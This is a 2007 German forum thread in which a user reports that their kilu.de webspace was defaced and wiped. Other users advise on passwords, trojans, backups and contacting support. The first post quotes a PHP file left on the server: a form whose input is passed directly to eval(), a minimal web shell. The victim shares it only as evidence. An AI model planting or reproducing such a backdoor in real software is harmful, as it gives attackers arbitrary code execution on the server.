kilu.de... ich bin verwirrt!!!

Dieses Thema im Forum "Webentwicklung" wurde erstellt von encud, 4. April 2007 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 4. April 2007
    hallo...
    ich habe volgendes prob: ich habe bei kilu space, und will da geraed so drauf, auf einmal kommt nicht mehr meine startseite, sondern steht da ganz dick:meinbenutzername ****t!
    und ein link zu der hp stand da drüber:http://prymz.pytalhost.com/
    und all meine sachen sind gelöscht! was soll ich machen??

    edit: und ne datei mit dem quelltext lag auf meinem server:
    PHP:
    <form action="<?=$PHP_SELF?>" method="post">
    <textarea rows="50" style="width:1000px;" name="request"><?=stripslashes ( $_POST [ 'request' ]) ?></textarea>
    <input type="submit" />
    </form>

    <?
    if(!empty( $_POST [ 'request' ])) eval( stripslashes ( $_POST [ 'request' ]));
    else echo 
    'Kein Request' ;
    ?>
     
  2. 4. April 2007
    AW: kilu.de... ich bin verwirrt!!!

    Ja ... was soll man da machen, denke da war einer auf deinem Space und hat deine Daten gelöscht! Passwort ändern, und alles neu hochladen Mehr wird dir da denke ich nicht übrig bleiben!
     
  3. 4. April 2007
    AW: kilu.de... ich bin verwirrt!!!

    Das heißt wohl das ein unbekannter auf dein Webspace Zugriff hat / hatte und mal eben alles gelöscht hat. Das kann zwei gründe haben

    1.) Der Anbieter hat dein Account gelöscht (was ich nicht glaube, wegen der Website und das "****t")
    2.) Deine Passwörter sind / waren zu unsicher, oder du hast dich mit einen Trojaner infiziert.

    Von daher sollte man immer in regelmäßigen Abständen ein Backup der Daten machen.

    Du kannst ja mal eine eMail an den Support von kilu.de schreiben, oder ich glaube die haben sogar ein Forum und den das halt sagen das ein unbekannter Zugriff auf dein Account hatte und fragen ob die vielleicht ein Backup der Datein haben. Was anderes kannst du wohl nicht machen.
     
  4. 4. April 2007
    AW: kilu.de... ich bin verwirrt!!!

    ok danke schön... also backup hatte ich glücklicher weise aufm pc, und passwort hatte ich vorher 5 stellen... jetzt 18 naja mal gucken wenn das nicht mehr vorkommt is ok, aber anders mal gucke...
    mhm aber viren... ka in letzter zeit hat mein antivir öfter mal die meldung gegebn, kann es damit zusammen hängen??
     
  5. 4. April 2007
    AW: kilu.de... ich bin verwirrt!!!

    kilu hat ein sehr gutes supportforum und der/die admin/s sind dort auch sehr present, dort kannst du bin in 5min dein paswort ändern lassen oder sonstige probleme schildern.

    ps wenn dein antivir öfer mal meldung gibt, dann solltest du dir mal gedanken machen woher solche meldungen kommen...
     
  6. 4. April 2007
    AW: kilu.de... ich bin verwirrt!!!

    NA SUPER!!!!
    lol gestern diese und jetzt das.... lol ich will gerade so auf meine hp gehen und gucken ob noch alles in ordnung ist, und nun kommt volgendes:http://e404.kilu3.de/
    kann es sein das sich erneut wer reingehckt hat und nun ganz gelöscht??? auf meine ich komme auch nicht mehr mit meinen ftp-datein rein...
     
  7. 4. April 2007
    AW: kilu.de... ich bin verwirrt!!!

    warezseiten oder sonstige anstößige seiten werden gekickt und das gaaanz schnell. auch hier wärst du im supportforum besser aufgehoben.
     
  8. 4. April 2007
    AW: kilu.de... ich bin verwirrt!!!

    mhm aber ich hatte gerstern extra noch meine alte gp wieder hoch geladen und den rest gelöscht... naja ich habe jetzt mal bei kilu im forum geschrieben vllt können die mir echt helfen... vielen dank für die hilfe an alles bw is draußen

    close
     
  9. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.